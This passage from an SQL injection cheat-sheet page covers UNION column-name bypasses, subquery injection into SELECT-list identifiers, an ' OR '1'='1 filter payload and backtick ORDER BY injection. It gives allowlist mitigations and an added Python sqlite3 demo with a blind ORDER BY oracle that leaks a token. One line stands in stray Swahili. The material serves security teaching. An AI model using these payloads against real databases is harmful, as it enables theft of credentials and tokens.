Bypass Column Names Restriction

First of all, note that if the original query and the table you want to extract the flag from have the same number of columns, you can simply do: 0 UNION SELECT * FROM flag

It is possible to access the third column of a table without using its name with a query like the following: SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F; (the derived table inherits the numeric column names 1, 2, 3 from the first SELECT), so in a SQL injection this would look like:

# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;

Au kutumia comma bypass:

# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c

This trick was taken from https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/

Column/tablename injection in SELECT list via subqueries

If user input is concatenated into the SELECT list or into table/column identifiers, prepared statements will not help, because bind parameters only protect values, not identifiers. A common vulnerable pattern is:

// Pseudocode
$fieldname = $_REQUEST['fieldname']; // attacker-controlled
$tablename = $modInstance->table_name; // sometimes also attacker-influenced
$q = "SELECT $fieldname FROM $tablename WHERE id=?"; // id is the only bound param
$stmt = $db->pquery($q, [$rec_id]);

Exploitation idea: inject a subquery in the field position to exfiltrate arbitrary data:

-- Legit
SELECT user_name FROM vte_users WHERE id=1;

-- Injected subquery to extract a sensitive value (e.g., password reset token)
SELECT (SELECT token FROM vte_userauthtoken WHERE userid=1) FROM vte_users WHERE id=1;

Notes:

  • This works even when the WHERE clause uses a bound parameter, because the identifier list is still assembled as a string.
  • Some stacks also let you control the table name (tablename injection), enabling cross-table reads.
  • Output sinks may reflect the selected value into HTML/JSON, allowing XSS or direct token exfiltration from the response.

Mitigations:

  • Do not concatenate identifiers from user input. Map allowed column names through a strict allowlist and quote identifiers properly.
  • If dynamic table access is required, constrain the set to a small allowlist and resolve it server-side from a safe map.

SQLi via AST/filter-to-SQL converters (JSON_VALUE predicates)

Some frameworks convert structured filter ASTs into raw SQL boolean fragments (e.g. metadata filters or JSON predicates) and then string-concatenate those fragments into larger queries. If the converter wraps string values as '%s' without escaping, a single quote in user input terminates the literal and the remainder is parsed as SQL.

Example pattern (conceptual):

JSON_VALUE(metadata, '$.department') = '<user_value>'

Payload (URL-encoded): %27%20OR%20%271%27%3D%271 → decoded: ' OR '1'='1 → the predicate becomes:

JSON_VALUE(metadata, '$.department') = '' OR '1'='1'

ORDER BY / identifier-based SQLi (PDO limitation)

Prepared statements cannot bind identifiers (column or table names). A common unsafe pattern is taking a user-controlled sort parameter and building ORDER BY by string concatenation, sometimes wrapping the input in backticks to "sanitize" it. This still allows SQLi because the identifier context is attacker-controlled: a backtick in the input closes the wrapper and the rest is parsed as SQL.

Vulnerable example:

$sort = $_POST['sort'];
$q = "SELECT id,item_name FROM items WHERE user_id=? ORDER BY `$sort`";
$stmt = $pdo->prepare($q);
$stmt->execute([$user_id]);

Signals in traffic:

  • A sort parameter in the POST body (often sort=column) that is not restricted to a fixed allowlist.
  • Changing sort breaks the query or changes the ordering of the results.
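Added example (not part of the original page), in Python with sqlite3, covering both this section and the SELECT-list subquery injection above: the id is bound with a placeholder, yet a subquery in the field position reads the token, and a backtick-wrapped sort parameter can be closed and extended. As a generalisation beyond the page's text, order_oracle() shows how a controlled ORDER BY becomes a true/false oracle: the result order flips depending on a condition on the token. Table names follow the page; the data and the allowlist fix are constructed.

```python
import sqlite3

ALLOWED_FIELDS = {"id", "user_name"}               # field names accepted as-is
ALLOWED_SORT = {"id": "id", "name": "item_name"}   # request key -> real column


def build_db() -> sqlite3.Connection:
    # Constructed sample tables using the page's names.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE vte_users (id INTEGER, user_name TEXT);
        INSERT INTO vte_users VALUES (1, 'admin');
        CREATE TABLE vte_userauthtoken (userid INTEGER, token TEXT);
        INSERT INTO vte_userauthtoken VALUES (1, 'tok-constructed-1234');
        CREATE TABLE items (id INTEGER, user_id INTEGER, item_name TEXT);
        INSERT INTO items VALUES (1, 1, 'pear'), (2, 1, 'apple');
    """)
    return conn


def fetch_field_vulnerable(conn: sqlite3.Connection, fieldname: str, rec_id: int):
    # Mirrors the page's pattern: id is bound, the SELECT list is still string-built.
    sql = f"SELECT {fieldname} FROM vte_users WHERE id=?"
    return conn.execute(sql, (rec_id,)).fetchone()[0]


def fetch_field_safe(conn: sqlite3.Connection, fieldname: str, rec_id: int):
    if fieldname not in ALLOWED_FIELDS:
        raise ValueError("field not allowed")
    # Quoted because it is an identifier; the allowlist is what actually makes it safe.
    sql = f'SELECT "{fieldname}" FROM vte_users WHERE id=?'
    return conn.execute(sql, (rec_id,)).fetchone()[0]


def list_items_vulnerable(conn: sqlite3.Connection, user_id: int, sort: str) -> list:
    # Backticks do not sanitise: the attacker closes them and keeps writing SQL.
    sql = f"SELECT id, item_name FROM items WHERE user_id=? ORDER BY `{sort}`"
    return [row[1] for row in conn.execute(sql, (user_id,)).fetchall()]


def list_items_safe(conn: sqlite3.Connection, user_id: int, sort: str) -> list:
    column = ALLOWED_SORT.get(sort)
    if column is None:
        raise ValueError("sort key not allowed")
    sql = f'SELECT id, item_name FROM items WHERE user_id=? ORDER BY "{column}"'
    return [row[1] for row in conn.execute(sql, (user_id,)).fetchall()]


def order_oracle(condition_sql: str) -> str:
    # Closes the backtick, turns the first ORDER BY term into a constant, and lets the
    # condition decide the direction: ascending id when true, descending when false.
    return f"id` IS NULL, (CASE WHEN ({condition_sql}) THEN id ELSE -id END)-- "


def demo() -> dict:
    conn = build_db()
    token_subquery = "(SELECT token FROM vte_userauthtoken WHERE userid=1)"
    guess_ok = f"substr({token_subquery}, 1, 3) = 'tok'"
    guess_bad = f"substr({token_subquery}, 1, 3) = 'zzz'"
    try:
        fetch_field_safe(conn, token_subquery, 1)
        safe_blocked = False
    except ValueError:
        safe_blocked = True
    return {
        "legit": fetch_field_vulnerable(conn, "user_name", 1),
        "leaked_token": fetch_field_vulnerable(conn, token_subquery, 1),
        "safe_blocked": safe_blocked,
        "order_true": list_items_vulnerable(conn, 1, order_oracle(guess_ok)),
        "order_false": list_items_vulnerable(conn, 1, order_oracle(guess_bad)),
        "safe_sort": list_items_safe(conn, 1, "name"),
    }


if __name__ == "__main__":
    print(demo())
```

The order oracle is the ORDER BY counterpart of the boolean-blind technique earlier on the page: no error and no content difference is needed, only which item is listed first. The allowlist functions never pass the request string to the database at all; they look it up and emit a name the code itself owns.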

Tools to suggest WAF bypasses

GitHub - m4ll0k/Atlas: Quick SQLMap Tamper Suggester · GitHub

Other Guides

Brute-Force Detection List

Auto_Wordlists/wordlists/sqli.txt at main · carlospolop/Auto_Wordlists · GitHub
